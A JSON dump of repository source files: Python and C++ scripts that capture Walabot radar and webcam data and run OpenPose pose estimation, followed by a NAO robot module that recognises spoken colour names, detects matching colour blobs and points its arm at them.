"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWriting for webcam data collection until\nwalabot is received\n\nijson can be used for iterative parsing\nLooks like possibly jsonstreams, but it's in beta... See if it works anyway???\n\"\"\"\nimport matplotlib.pyplot as plt\nimport WalabotAPI as wala\nimport cv2 as cv\nimport numpy as np\nfrom datetime import datetime\nimport json\nimport jsonstreams\nimport time\nimport argparse\nimport os.path\nimport threading\nimport keyboard\n\n# Argument parsing block to receive data session number as integer.\n # Script expects input as -datasession <integer>\n # Input defines common file name association for \n # video, timestamp and walabot\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-datasession', action='store', dest='datasession', type=str, help='Enter the data session number -datasession <integer>',\nrequired=True)\nparse_results = parser.parse_args()\n\n# Check to ensure datasession files don't already exist\n\nif(os.path.exists('../data/raw/framedata_' + parse_results.datasession + '.json') or (os.path.exists('../data/raw/rbg_' + parse_results.datasession + '.mp4'))):\n print('Data session files already exist, cannot overwrite')\n exit()\n\n# Walbot Initialization\n # SetProfile is chosen from a number of options, see Walabot API\n # SetThreshold defines the minimum reflected power to be imaged\n # SetDynamicImageFilter is chosen from a number of options, see walabot API\n\nTHRESHOLD = 15\n\nwala.Init()\nwala.SetSettingsFolder()\nwala.ConnectAny()\nwala.SetProfile(wala.PROF_SENSOR)\nwala.SetThreshold(THRESHOLD)\nwala.SetDynamicImageFilter(wala.FILTER_TYPE_NONE)\n\n# Walabot 'Arena' settings\n # *_R values define spherical radial distance of imaging\n # All res_* values determine angle in degrees between antenna \n # Some Arena settings commented out for testing\n\nmin_R, max_R, res_R = 216, 457, 5\nwala.SetArenaR(min_R, max_R, res_R)\n\nmin_Theta, max_Theta, res_Theta = -19, 19, 5\nwala.SetArenaTheta(min_Theta, max_Theta, res_Theta)\n\nmin_Phi, max_Phi, res_Phi = -43, 43, 5\nwala.SetArenaPhi(min_Phi, max_Phi, res_Phi)\n\n\n# Start Walabot and perform calibration\n\nwala.Start()\nwala.StartCalibration()\n\ncalibration_status, calibration_progress = wala.GetStatus()\nwala.Trigger()\n\nwhile calibration_status == wala.STATUS_CALIBRATING and calibration_progress < 100:\n wala.Trigger()\n print(\"Calibrating \" + str(calibration_progress) + '%')\n calibration_status, calibration_progress = wala.GetStatus()\n\n# Initialize video camera. Wait 1 second for 'warmup'\n\ncap = cv.VideoCapture(1)\ntime.sleep(1)\n\n# WebCam capture dimensions, a cv2 method\n\ncap.set(3, 640)\ncap.set(4, 480)\n\n# Video Codec settings. 
See fourcc.org for more info\n\nfourcc = cv.VideoWriter_fourcc(*'mp4v')\n\n# Set write path destination for video output, Walabot and timestamp\n\nvideo_out = cv.VideoWriter('../data/raw/rbg_' + parse_results.datasession + '.mp4', fourcc, 20.0, (640, 480))\ntime_stamp_out = jsonstreams.Stream(jsonstreams.Type.object, filename='../data/raw/framedata_' + parse_results.datasession + '.json')\nwala_out = jsonstreams.Stream(jsonstreams.Type.object, filename='../data/raw/wala_' + parse_results.datasession + '.json')\n\n# frame_count used to incrimente every loop, matches frame captures\n\nframe_count = 1\n\n\"\"\"\nax1 = plt.subplot(1, 1, 1)\nret, frame = cap.read()\nfirst_image = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\nim1 = ax1.imshow(first_image)\n\"\"\"\n\nwhile True:\n\n # Trigger the walabot for a frame, then read a camera frame\n # wala.GetRawImage return the 3D image, refer to Walabot API for function details\n \n start = time.time()*1000\n wala.Trigger()\n ret, frame = cap.read()\n\n #wala_data, sizeX, sizeY, depth, power = wala.GetRawImage()\n \n wala_data = wala.GetRawImage()\n \n # Write a single video frame to file then\n # write a single walabot entry to the json stream\n \n wala_out.write(str(frame_count), wala_data)\n video_out.write(frame)\n time_stamp_out.write(str(frame_count), [ str(datetime.now()) ] )\n \n\n frame_count += 1\n\n cv.imshow('frame', frame)\n\n end = time.time()*1000\n print(end-start)\n \n\n # Periodically update walabot visualization with 2D slice\n\n \"\"\"\n if frame_count%8 == 0:\n try:\n wala_data_slice, sizeX, sizeY, depth, power = wala.GetRawImageSlice()\n plt.imshow(wala_data_slice)\n plt.pause(0.05)\n except:\n print(\"closing matplotlib\")\n \"\"\"\n\n #cv.imshow('frame', frame)\n #frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n #im1.set_data(frame)\n #plt.pause(.05)\n \n if(keyboard.is_pressed('q')):\n # Close the jsonstreams objects, this adds the closing '}' to the file\n time_stamp_out.close()\n wala_out.close()\n\n # Take a quick break, walabot\n wala.Disconnect()\n wala.Clean()\n\n # Close out the cv objects, go home, go to sleep. Goodnight.\n cap.release()\n cv.destroyAllWindows()\n break\n \n#plt.ioff()\n\n#start = time.time()\n"
},
{
"alpha_fraction": 0.575025200843811,
"alphanum_fraction": 0.6263846755027771,
"avg_line_length": 21.56818199157715,
"blob_id": "6ae79b5dd8204eedf46550bf1e733193016dd6e9",
"content_id": "7734dd62a8412550f85ad42c279a4f8a63bc6b94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 44,
"path": "/openpose_testing/openpose_testing.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import cv2 as cv\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport os.path\n\nPATHRAWDATA = '../data/raw/'\nVIDNAME = 'rbg_'\nVIDEXT = '.mp4'\nFRAMENAME = 'framedata_'\nFRAMEEXT = '.json'\n\nbody_parts = { \"Head\": 0, \"Neck\": 1, \"RShoulder\": 2, \"RElbow\": 3, \"RWrist\": 4,\n \"LShoulder\": 5, \"LElbow\": 6, \"LWrist\": 7, \"RHip\": 8, \"RKnee\": 9,\n \"RAnkle\": 10, \"LHip\": 11, \"LKnee\": 12, \"LAnkle\": 13, \"Chest\": 14,\n \"Background\": 15 }\n\nimageName = 'simple_pose.jpg'\n\ncap = cv.imread(os.path.relpath(imageName))\n\nnet = cv.dnn.readNet(os.path.relpath('openpose_pose_mpi_faster_4_stages.prototxt'), \n os.path.relpath('pose_iter_160000.caffemodel'))\n\nheight, width, depth = cap.shape\n\nprint(height)\nprint(width)\nprint(depth)\n\nblob = cv.dnn.blobFromImage(cap, 1.0 / 255, (640, 480), (0, 0, 0), swapRB=False, crop=False)\n\nnet.setInput(blob)\n\nout = net.forward()\n\nprint(out[0, 0, :, :])\n\nprint(out.shape)\n\nprint(out.shape[3])\n\ncv.imshow('map', out[0, 0])\n\nk = cv.waitKey(0)\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7458646893501282,
"avg_line_length": 21.200000762939453,
"blob_id": "c79d2916bada9f1b07050b77ba261316a8d0a1d4",
"content_id": "86529ca01807fd30de1aeb94f7d3493e73674917",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 665,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 30,
"path": "/walabot_testing/walabot_resolution_validation.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import WalabotAPI as wala\nimport time\nimport keyboard\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \nimport time\n\nTHRESHOLD = 15\n\nwala.Init()\nwala.SetSettingsFolder()\nwala.ConnectAny()\nwala.SetProfile(wala.PROF_SENSOR)\nwala.SetThreshold(THRESHOLD)\nwala.SetDynamicImageFilter(wala.FILTER_TYPE_NONE)\n\nmin_R, max_R, res_R = 216, 457, 2\nwala.SetArenaR(min_R, max_R, res_R)\n\nmin_Theta, max_Theta, res_Theta = -19 , 19, 2\nwala.SetArenaTheta(min_Theta, max_Theta, res_Theta)\n\nmin_Phi, max_Phi, res_Phi = -43, 43, 2\nwala.SetArenaPhi(min_Phi, max_Phi, res_Phi)\n\ntry:\n wala.Start()\nexcept:\n print('resoltuion out of bounds')"
},
{
"alpha_fraction": 0.6274510025978088,
"alphanum_fraction": 0.6764705777168274,
"avg_line_length": 16.16666603088379,
"blob_id": "bb0390350cdfa4fb7c3276a1a893be5dac7b5f1b",
"content_id": "b2bc3c6c57422ee93dcff62c0aceee239805f9b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/data/processed/readJSONtest.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import json\n\nreadTest = open('framedata_1.json')\ndata = json.load(readTest)\n\nprint(data[\"1\"][1][0][2])"
},
{
"alpha_fraction": 0.6160147786140442,
"alphanum_fraction": 0.6318710446357727,
"avg_line_length": 30.02458953857422,
"blob_id": "c19a202718203304d2abb0d1fcb3b89253ffdc47",
"content_id": "02a8962fe0158366aa1ef6510b3124a1020a6da4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3784,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 122,
"path": "/data_processor/data_processor.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWriting to process webcam footage only, until walabot is setup\n\ntodo: \nwrite JSON file every ?x? iterations to prevent memory exhaustion \n\nfunctionalize processing elements\n\nflag for selective capture of openpose data elements\n\nwalabot processing -> convert to cartesian coordinates\n dimensional reduction\n ?\n\"\"\"\n\nimport cv2 as cv\nimport argparse\nimport data_processor_functions as dpf\nimport os.path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport json\n\nPATHRAWDATA = '../data/raw/'\nVIDNAME = 'rbg_'\nVIDEXT = '.mp4'\nFRAMENAME = 'framedata_'\nFRAMEEXT = '.json'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-rangestart', action='store', dest='rangestart', help='Enter the starting data session number',\nrequired=True)\nparser.add_argument('-rangeend', action='store', dest='rangeend', help=\"Enter the ending data session number\",\nrequired=True)\nresults = parser.parse_args()\n\nstart = results.rangestart\nend = results.rangeend\n\n#verfiy data files in range\n#***add RF data file check after walabot is online***\ndpf.verifyDataFiles(start, end)\n\nbody_parts = dpf.MPIBodyParts()\npose_pairs = dpf.MPIPosePairs()\n\n#Required to refresh matplotlib heatmap overlay\nplt.ion()\n\nfor i in range(int(start), int(end)+1):\n vidName = PATHRAWDATA + VIDNAME + str(i) + VIDEXT\n frameDataName = PATHRAWDATA + FRAMENAME + str(i) + FRAMEEXT\n\n jsonFile = open(frameDataName)\n frameData = json.load(jsonFile)\n\n cap = cv.VideoCapture(vidName)\n\n length = int(cap.get(cv.CAP_PROP_FRAME_COUNT))\n print(str(length) + ' frames to process from ' + vidName)\n\n net = cv.dnn.readNet(os.path.relpath('openpose_pose_mpi_faster_4_stages.prototxt'), \n os.path.relpath('pose_iter_160000.caffemodel'))\n\n while True:\n hasFrame, frame = cap.read()\n currentFrame = cap.get(cv.CAP_PROP_POS_FRAMES)\n\n #End of video will trigger break\n if(not hasFrame):\n print('done')\n break\n\n frameWidth = frame.shape[1]\n frameHeight = frame.shape[0]\n\n blob = cv.dnn.blobFromImage(frame, 1.0 / 255, (640, 480), (0, 0, 0), swapRB=False, crop=False)\n net.setInput(blob)\n print('Processing frame ' + str(currentFrame))\n out = net.forward()\n \n probmapVIS1 = out[0, 0, :, :]\n probmapVIS2 = out[0, 1, :, :]\n probmapVIS3 = out[0, 2, :, :]\n probmapVIS4 = out[0, 3, :, :]\n \"\"\"\n for j in range(1, len(body_parts)):\n probmapVIS = probmapVIS + out[0, j, :, :]\n \"\"\"\n \n points = []\n for j in range(0, len(body_parts)):\n probmapPoints = out[0, j, :, :]\n _, conf, _, point = cv.minMaxLoc(probmapPoints)\n\n x = ((frameWidth * point[0]) / out.shape[3])\n y = ((frameHeight * point[1]) / out.shape[2])\n\n points.append((int(x), int(y)) if conf > .1 else None)\n\n \n #Currently appending all openpose data, probability part map and affinity map\n frameData[str(int(currentFrame))].append(out.tolist())\n frameData[str(int(currentFrame))].append(points)\n\n \n #***for visualization ONLY, remove for large data proccesing event***\n probmapVIS1 = cv.resize(probmapVIS1, (frameWidth, frameHeight))\n dpf.plotProbMap(probmapVIS1, frame)\n\n #***for point visualization ONLY, remove for large data processing event***\n #Points are already scaled to original image size\n for i in range(15):\n cv.circle(frame, points[i], 5, (25, 0, 255), 5)\n cv.imshow('frame', frame)\n \n\n #After each vid proccess, write to proccessed json file\n \n with open(PATHPROCCDATA + FRAMENAME + str(i) + FRAMEEXT, 'w') as fp:\n json.dump(frameData, fp)"
},
{
"alpha_fraction": 0.6429780125617981,
"alphanum_fraction": 0.6499153971672058,
"avg_line_length": 32.95977020263672,
"blob_id": "dc29e18bf0b965a7643d6915f3674cff96e8acf3",
"content_id": "1ac60644f0a53ee7821be743d15f2c90a629bb4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5910,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 174,
"path": "/walabot_testing/walabot_cpp.cpp",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "#include \"C:\\Program Files\\Walabot\\WalabotSDK\\inc\\WalabotAPI.h\"\n#include <iostream>\n#include <stdio.h>\n#include <string>\n\n#ifdef __LINUX__\n #define CONFIG_FILE_PATH \"/etc/walabotsdk.conf\"\n#else\n #define CONFIG_FILE_PATH \"C:\\\\Program Files\\\\Walabot\\\\WalabotSDK\\\\bin\\\\.config\"\n#endif\n#define CHECK_WALABOT_RESULT(result, func_name) \\\n{ \\\n if (result != WALABOT_SUCCESS) \\\n { \\\n const char* errorStr = Walabot_GetErrorString(); \\\n std::cout << std::endl << func_name << \" error: \" \\\n << errorStr << std::endl; \\\n std::cout << \"Press enter to continue ...\"; \\\n std::string dummy; \\\n std::getline(std::cin, dummy); \\\n return; \\\n } \\\n}\nvoid PrintSensorTargets(SensorTarget* targets, int numTargets)\n{\n int targetIdx;\n#ifdef __LINUX__\n printf(\"\\033[2J\\033[1;1H\");\n#else\n system(\"cls\");\n#endif\n if (numTargets > 0)\n {\n for (targetIdx = 0; targetIdx < numTargets; targetIdx++)\n {\n printf(\"Target #%d: \\nX = %lf \\nY = %lf \\nZ = %lf \\namplitude = %lf\\n\\n\\n \",\n targetIdx,\n targets[targetIdx].xPosCm,\n targets[targetIdx].yPosCm,\n targets[targetIdx].zPosCm,\n targets[targetIdx].amplitude);\n }\n }\n else\n {\n printf(\"No target detected\\n\");\n }\n}\nvoid SensorCode_SampleCode()\n{\n // --------------------\n // Variable definitions\n // --------------------\n WALABOT_RESULT res;\n // Walabot_GetSensorTargets - output parameters\n SensorTarget* targets;\n int numTargets;\n // Walabot_GetStatus - output parameters\n APP_STATUS appStatus;\n double calibrationProcess; // Percentage of calibration completed, if status is STATUS_CALIBRATING\n // Walabot_GetRawImageSlice - output parameters\n int* rasterImage;\n int sizeX;\n int sizeY;\n double sliceDepth;\n double power;\n // ------------------------\n // Initialize configuration\n // ------------------------\n // Walabot_SetArenaR - input parameters\n double minInCm = 30;\n double maxInCm = 200;\n double resICm = 3;\n // Walabot_SetArenaTheta - input parameters\n double minIndegrees = -15;\n double maxIndegrees = 15;\n double resIndegrees = 5;\n // Walabot_SetArenaPhi - input parameters\n double minPhiInDegrees = -60;\n double maxPhiInDegrees = 60;\n double resPhiInDegrees = 5;\n // ----------------------\n // Sample Code Start Here\n // ----------------------\n /*\n For an image to be received by the application, the following need to happen :\n 1) Connect\n 2) Configure\n 3) Calibrate\n 4) Start\n 5) Trigger\n 6) Get action\n 7) Stop/Disconnect\n */\n bool mtiMode = true;\n res = Walabot_Initialize(CONFIG_FILE_PATH);\n CHECK_WALABOT_RESULT(res, \"Walabot_Initialize\");\n \n // 1) Connect : Establish communication with Walabot.\n // ==================================================\n res = Walabot_ConnectAny();\n CHECK_WALABOT_RESULT(res, \"Walabot_ConnectAny\");\n // 2) Configure : Set scan profile and arena\n // =========================================\n // Set Profile - to Sensor. 
\n // Walabot recording mode is configured with the following attributes:\n // -> Distance scanning through air; \n // -> high-resolution images\n // -> slower capture rate \n res = Walabot_SetProfile(PROF_SENSOR);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetProfile\");\n // Setup arena - specify it by Cartesian coordinates(ranges and resolution on the x, y, z axes); \n // In Sensor mode there is need to specify Spherical coordinates(ranges and resolution along radial distance and Theta and Phi angles).\n res = Walabot_SetArenaR(minInCm, maxInCm, resICm);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetArenaR\");\n // Sets polar range and resolution of arena (parameters in degrees).\n res = Walabot_SetArenaTheta(minIndegrees, maxIndegrees, resIndegrees);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetArenaTheta\");\n // Sets azimuth range and resolution of arena.(parameters in degrees).\n res = Walabot_SetArenaPhi(minPhiInDegrees, maxPhiInDegrees, resPhiInDegrees);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetArenaPhi\");\n FILTER_TYPE filterType = mtiMode ?\n FILTER_TYPE_MTI : //Moving Target Identification: standard dynamic-imaging filter\n FILTER_TYPE_NONE;\n res = Walabot_SetDynamicImageFilter(filterType);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetDynamicImageFilter\");\n // 3) Start: Start the system in preparation for scanning.\n // =======================================================\n res = Walabot_Start();\n CHECK_WALABOT_RESULT(res, \"Walabot_Start\");\n // 4) Start Calibration - only if MTI mode is not set - (there is no sense \n // executing calibration when MTI is active)\n // ========================================================================\n if (!mtiMode) \n {\n // calibrates scanning to ignore or reduce the signals\n res = Walabot_StartCalibration();\n CHECK_WALABOT_RESULT(res, \"Walabot_StartCalibration\");\n }\n bool recording = true;\n while (recording)\n {\n // calibrates scanning to ignore or reduce the signals\n res = Walabot_GetStatus(&appStatus, &calibrationProcess);\n CHECK_WALABOT_RESULT(res, \"Walabot_GetStatus\");\n // 5) Trigger: Scan(sense) according to profile and record signals to be \n // available for processing and retrieval.\n // ====================================================================\n res = Walabot_Trigger();\n CHECK_WALABOT_RESULT(res, \"Walabot_Trigger\");\n // 6) Get action : retrieve the last completed triggered recording \n // ================================================================\n res = Walabot_GetSensorTargets(&targets, &numTargets);\n CHECK_WALABOT_RESULT(res, \"Walabot_GetSensorTargets\");\n res = Walabot_GetRawImageSlice(&rasterImage, &sizeX, &sizeY, &sliceDepth, &power);\n CHECK_WALABOT_RESULT(res, \"Walabot_GetRawImageSlice\");\n // ******************************\n // TODO: add processing code here\n // ******************************\n PrintSensorTargets(targets, numTargets);\n }\n // 7) Stop and Disconnect.\n // ======================\n res = Walabot_Stop();\n CHECK_WALABOT_RESULT(res, \"Walabot_Stop\");\n res = Walabot_Disconnect();\n CHECK_WALABOT_RESULT(res, \"Walabot_Disconnect\");\n Walabot_Clean();\n CHECK_WALABOT_RESULT(res, \"Walabot_Clean\");\n}\nint main()\n{\n SensorCode_SampleCode();\n}\n\n"
},
{
"alpha_fraction": 0.6522058844566345,
"alphanum_fraction": 0.6882352828979492,
"avg_line_length": 21.098360061645508,
"blob_id": "f0a49ea5cf3468427258eff2280421117ac7c0c9",
"content_id": "9b1a470241c9dd0d35c29c05560d49f0458a1e3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1360,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 61,
"path": "/walabot_testing/walabot_testing.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import WalabotAPI as wala\nimport time\nimport keyboard\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \nimport time\n\nTHRESHOLD = 15\n\nwala.Init()\nwala.SetSettingsFolder()\nwala.ConnectAny()\nwala.SetProfile(wala.PROF_SENSOR)\nwala.SetThreshold(THRESHOLD)\nwala.SetDynamicImageFilter(wala.FILTER_TYPE_NONE)\n\nmin_R, max_R, res_R = 216, 762, 8\nwala.SetArenaR(min_R, max_R, res_R)\n\nmin_Theta, max_Theta, res_Theta = -19, 19, 8\nwala.SetArenaTheta(min_Theta, max_Theta, res_Theta)\n\nmin_Phi, max_Phi, res_Phi = -43, 43, 8\nwala.SetArenaPhi(min_Phi, max_Phi, res_Phi)\n\nwala.Start()\nwala.StartCalibration()\n\ncalibration_status, calibration_progress = wala.GetStatus()\nwala.Trigger()\n\nwhile calibration_status == wala.STATUS_CALIBRATING and calibration_progress < 100:\n wala.Trigger()\n print(\"Calibrating \" + str(calibration_progress) + '%')\n calibration_status, calibration_progress = wala.GetStatus()\n\n#create initial images\n\nwala.Trigger()\nwala_data = wala.GetRawImage()\nwala_data_np = np.array(wala_data[0])\n \nsum = 0.0\ncount = 0\n\nwhile True:\n\n start = time.time()*1000\n wala.Trigger()\n\n wala_data = wala.GetRawImage()\n\n end = time.time()*1000\n sum = sum + (end-start)\n count += 1\n\n if(count%20 == 0):\n print('fps: {}'.format(1000/(sum/20)))\n sum = 0.0\n count = 0 \n \n "
}
] | 11 |
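Both OpenPose scripts above extract one keypoint per body part by taking the arg-max of its probability map and rescaling from network-output coordinates to frame coordinates; the same step as a standalone helper (the function name and threshold are illustrative, not from the repository):

    import cv2 as cv

    def keypoint_from_probmap(probmap, frame_w, frame_h, out_w, out_h, thresh=0.1):
        # minMaxLoc returns (minVal, maxVal, minLoc, maxLoc); keep the most confident pixel.
        _, conf, _, point = cv.minMaxLoc(probmap)
        if conf < thresh:
            return None
        return (int(frame_w * point[0] / out_w), int(frame_h * point[1] / out_h))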
burmeisc/ColourRobo
|
https://github.com/burmeisc/ColourRobo
|
aa59ac71e6c55e1b8fbc5ade180594f551b991bd
|
189084d66316b629a5a29dadc3d6ad483aa34dba
|
008138bfe40c6b4c731577c2255a65e961f5136e
|
refs/heads/master
| 2021-05-10T18:46:38.283358 | 2018-05-22T10:53:05 | 2018-05-22T10:53:05 | 118,134,951 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5873897671699524,
"alphanum_fraction": 0.6011107563972473,
"avg_line_length": 30.665517807006836,
"blob_id": "6fea2f15643f288c3f3e44e4a0b2869ba558f25a",
"content_id": "13641860140794fe5429dd6730bae65ddbc7d634",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9183,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 290,
"path": "/main_listen_loop.py",
"repo_name": "burmeisc/ColourRobo",
"src_encoding": "UTF-8",
"text": "\"\"\" Cannot be tested on simulated robot\n\n Repeats color when heard.\n\"\"\"\n\nimport sys\nimport time\nimport almath\nfrom naoqi import ALProxy\nfrom naoqi import ALBroker\nfrom naoqi import ALModule\nfrom math import pi, sin, atan2\nfrom vision.vision_showimages import ImageWidget\nfrom PyQt4.QtGui import QApplication\nfrom optparse import OptionParser\nfrom vision.color_recognition import ColorDetectionModule\n\nNAO_IP = \"nao2.local\"\nPORT = 9559\nCameraID = 1\n\n# Global variable to store the ColourOrder module instance\nColourOrder = None\nmemory = None\nColorDetection = None\ncolorBlob = None\n\n\nclass ColourOrderModule(ALModule):\n \"\"\" A simple module able to react\n to speech events\n\n \"\"\"\n def __init__(self, name):\n ALModule.__init__(self, name)\n # No need for IP and port here because\n # we have our Python broker connected to NAOqi broker\n\n # Create a proxy to ALTextToSpeech for later use\n self.tts = ALProxy(\"ALTextToSpeech\")\n self.blobProxy = ALProxy(\"ALColorBlobDetection\")\n self.motionProxy = ALProxy(\"ALMotion\")\n self.postureProxy = ALProxy(\"ALRobotPosture\")\n self.postureProxy.goToPosture(\"Stand\", 0.5)\n self.moovementProxy = ALProxy(\"ALAutonomousMoves\")\n self.moovementProxy.setExpressiveListeningEnabled(False) #hoer auf rumzuzappeln\n self.videoProxy = ALProxy(\"ALPhotoCapture\")\n self.distance = 500#mm x-distance between camera and blob = b\n print \"CameraID = %s\"%self.videoProxy.getCameraID()\n #print \"Resolution = %s\"%self.videoProxy.setResolution()\n print \"Resolution = %s\"%self.videoProxy.getResolution()\n global memory\n memory = ALProxy(\"ALMemory\")\n\n speech = ALProxy(\"ALSpeechRecognition\")\n\n #module for detecting color through vision\n #global ColorDetection\n #ColorDetection = ColorDetectionModule(\"ColorDetection\")\n\n # List of colours which can be recognized\n speech.pause(True)\n speech.setVocabulary([\"red\", \"blue\", \"black\", \"green\"], False)\n speech.pause(False)\n\n # Subscribe to the WordRecognized event:\n memory.subscribeToEvent(\"WordRecognized\",\n \"ColourOrder\",\n \"onColorHeard\")\n #for video stream\n '''\n app = QApplication(sys.argv)\n myWidget = ImageWidget(NAO_IP, PORT, CameraID)\n myWidget.show()\n '''\n\n\n def onColorHeard(self, *_args):\n \"\"\" This will be called each time a colour order (spoken) is\n detected.\n\n \"\"\"\n #read recognized word from memory\n words = memory.getData(\"WordRecognized\")\n\n # Unsubscribe to the event when reacting,\n # to avoid repetitions\n memory.unsubscribeToEvent(\"WordRecognized\",\n \"ColourOrder\")\n\n color = words[0]\n str = \"I'll look for a %s blob!\"%color\n #self.tts.say(str)\n print str\n #time.sleep(30)\n if color == \"red\":\n red = 255\n green = 0\n blue = 0\n elif color == \"blue\":\n red = 100\n green = 50\n blue = 255\n elif color == \"green\":\n red = 0\n green = 255\n blue = 0\n elif color == \"black\":\n red = 255\n green = 255\n blue = 255\n else:\n self.tts.say(\"Weird! 
I should no be able to see this color!\")\n\n #Call ColorDetection from vision module, so colour can be recgonized\n #subscribes to BlopDetection event\n\n self.subscribeToBlopDetection(red, green, blue)\n time.sleep(2)\n\n def subscribeToBlopDetection(self, red, green, blue):\n \"\"\"subscribe to blop event\"\"\"\n\n self.blobProxy.setColor(red, green, blue, 50)\n self.blobProxy.setObjectProperties(10, 2) #TODO testen ob das der abstand ist\n #self.blobProxy.setObjectProperties(10, self.distance/1000)\n\n\n\n memory.subscribeToEvent(\"ALTracker/ColorBlobDetected\",\n \"ColourOrder\",\n \"onColorDetected\")\n\n\n print(\"subscribe to Blop\")\n\n def onColorDetected(self, *_args):\n \"\"\" This will be called each time a color is\n detected.\n\n \"\"\"\n # Unsubscribe to the event when talking,\n # to avoid repetitions\n\n memory.unsubscribeToEvent(\"ALTracker/ColorBlobDetected\",\n \"ColourOrder\")\n\n circle_coordinates = self.blobProxy.getCircle()\n if not circle_coordinates:\n print \"Circle to small\"\n # Subscribe again to the event\n memory.subscribeToEvent(\"ALTracker/ColorBlobDetected\",\n \"ColourOrder\", \"onColorDetected\")\n else:\n print \"circle_coordinates = %s\"%(circle_coordinates[0]/160)\n str = \"I can see one over there!\"\n #self.tts.say(str)\n print str\n self.point_at_circle(circle_coordinates[0]/160)\n time.sleep(2)\n\n # Subscribe again to the event\n memory.subscribeToEvent(\"WordRecognized\",\n \"ColourOrder\",\n \"onColorHeard\")\n\n\n def point_at_circle(self, x_value_pic):\n\n\n # Wake up robot-----------------------------------------------------\n self.motionProxy.wakeUp()\n\n # Calculate angle of arm in order to point at blob------------------\n # set fixet roboter values\n camera_horizontal_angle = 60.97*almath.TO_RAD #=alhpa\n dy_shoulder = 98#mm #98mm wenn genau mitte bei keiner kopfdrehung\n if dy_shoulder < 32:\n print \"WARNING! blob is too close for pointing!\"\n\n print\"y value of blob in percent from left pic side is %s\"%x_value_pic\n\n # use sin(alpha)/a = sin(beta)/b to get horizon_length\n\n print\"distance of blob is %s\"%self.distance\n\n horizon_length = 2*self.distance*sin(camera_horizontal_angle/2)/sin(90-camera_horizontal_angle/2) #=a, betha=180-90-60.97/2\n #horizon_length = 600\n\n print\"Horizon length is %s\"%horizon_length\n\n x_length = x_value_pic * horizon_length\n print\"y length of blob in percent from left pic side is %s\"%x_length\n\n distance_to_center = abs(x_length - (horizon_length/2))\n print\"y distance of blob to robot center is %s\"%distance_to_center\n\n if x_value_pic > 0.5:#user right arm\n target = \"RArm\"\n ellbow_roll = -pi/2\n\n distance_to_shoulder = dy_shoulder-distance_to_center #TODO checken was passiert wenn negativ? (weiter rechts als re. 
schulter)\n angle_for_pointing = atan2(distance_to_shoulder, self.distance)\n handName = \"RHand\"\n\n else:\n target = \"LArm\"\n distance_to_shoulder = distance_to_center-dy_shoulder\n ellbow_roll = pi/2\n angle_for_pointing = atan2(distance_to_shoulder, self.distance)\n handName = \"LHand\"\n\n print\"y distance of blob to robots right shoulder is %s\"%distance_to_shoulder\n\n targetAngles = [0, angle_for_pointing,ellbow_roll,0,0,pi]\n\n print \"angle = %s\"%(angle_for_pointing*almath.TO_DEG)\n\n #moove arm --------------------------------------------------------\n maxSpeedFraction = 0.2\n self.motionProxy.angleInterpolationWithSpeed(target, targetAngles, maxSpeedFraction)\n self.motionProxy.openHand(handName);\n\n time.sleep(5)\n\n targetAngles = [pi/2,0,0,0,0,0]\n self.motionProxy.angleInterpolationWithSpeed(target, targetAngles, maxSpeedFraction)\n\n def exit_program(self):\n self.motionProxy.rest()\n\ndef main():\n \"\"\" Main entry point\n\n \"\"\"\n parser = OptionParser()\n parser.add_option(\"--pip\",\n help=\"Parent broker port. The IP address or your robot\",\n dest=\"pip\")\n parser.add_option(\"--pport\",\n help=\"Parent broker port. The port NAOqi is listening to\",\n dest=\"pport\",\n type=\"int\")\n parser.set_defaults(\n pip=NAO_IP,\n pport=9559)\n\n (opts, args_) = parser.parse_args()\n pip = opts.pip\n pport = opts.pport\n\n # We need this broker to be able to construct\n # NAOqi modules and subscribe to other modules\n # The broker must stay alive until the program exists\n myBroker = ALBroker(\"myBroker\",\n \"0.0.0.0\", # listen to anyone\n 0, # find a free port and use it\n pip, # parent broker IP\n pport) # parent broker port\n\n\n # Warning: ColourOrder must be a global variable\n # The name given to the constructor must be the name of the\n # variable\n global ColourOrder\n ColourOrder = ColourOrderModule(\"ColourOrder\")\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n print\n print \"Interrupted by user, 